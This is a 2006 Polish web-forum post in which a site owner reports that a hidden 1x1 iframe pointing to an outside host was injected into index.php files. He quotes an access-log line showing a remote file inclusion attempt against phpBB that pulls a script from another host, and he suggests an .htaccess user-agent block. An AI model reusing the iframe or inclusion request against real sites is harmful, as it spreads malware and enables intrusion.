Problem index.php frameborder=0 src="http://qufo.info/x

 

Strona 1 z 1 [ 1 post ]

Widok do druku | « Poprzedni temat | Następny temat »

Temat

• Wysłany: 06 Gru 2006, 10:50

  Djvolt1

  

  
  Rejestracja: 08 Sie 2005, 17:42
  Posty: 22
  Witajcie, ostatnio pisałem w temacie :
  
  http://www.phpbb2.pl/forum/viewtopic.php?t=16828
  
  lecz nikt nie pomogł i mowił że jest to niemozliwe.
  
  LEcz teraz sami to doświadczacie na przykładzie strony głownej www.phpbb2.pl na samej goze widnieje :
  
  <iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe>
  
  co ciekawe ten ktoś ni eatakuje tylko stron związanych z phpbb itp a nawet zwykłe strony w htmlu , php, nawet dziś domnie znajomy napisał ze coś sie stało ze sklepem OsComersa, sprawdzilem plik index.php sklepu i na samym początku widnieje co ???
  
  a to, taki kod ktoś umieścił:
  
  

  Kod:

  <iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe>

  
  
  i teraz pytanie, czy wiecie jak ta osoba zapisała to w pliku index.php ?? i jak temu zapobiec, bo ciągłe wgrywanie pliku index.php staje się powoli nudne.
  
  Prosze o rozsądne odpowiedzi a nie w stylu sprawdz sobei konfiguracje serwera itp . Bo bład nie tyczy się tylko mojej , waszej strony i tego sklepu . Ale tez innych użytkowników co posiadają własne stronki i fora na phpbb.
  
  Jeżeli będe wiedział jakies dokładniejsze dane to oczywiście napisze co i jak . Narazie pisany jest list do Abuse do firmy co zarejestrowała ta domene itp .
  
  pozdro
  
  pozdro Bartas
  
  [ Dodano: 06 Gru 2006 12:31 ]
  Hey , chyba znalazłem rozwiązanie, włam dokonują wykozystująć pearla,
  
  W moich logach od godziny 24 widnieja co jakieś 5 minut takie wpisy:
  
  

  Kod:

  207.234.129.220 - - [06/Dec/2006:00:00:04 +0000] "GET /admin/admin_board.php?phpbb_root_path=http://www.sohbetalevi.com/lol1.txt? HTTP/1.1" 401 469 "-" "libwww-perl/5.65"

  
  
  Różnią się jedynie adresami IP z których dokonywany jest atak na strone / forum
  
  więcej znajdziecie tu :
  
  http://www.cyberciti.biz/tips/the-rise- ... -perl.html
  
  najlepszym sposobem jest zablokowanie w .htaccess
  
  

  Kod:

  SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
  Deny from env=block_bad_bots

  
  
  Powinny sie problemy skończyć, testuje to akurat umnie na serwerze, wiec polecam uwas zrobić to samo
  
  O wynikach dam znać
  
  pozdro

  

Odpowiedzi

 

Strona 1 z 1 [ 1 post ]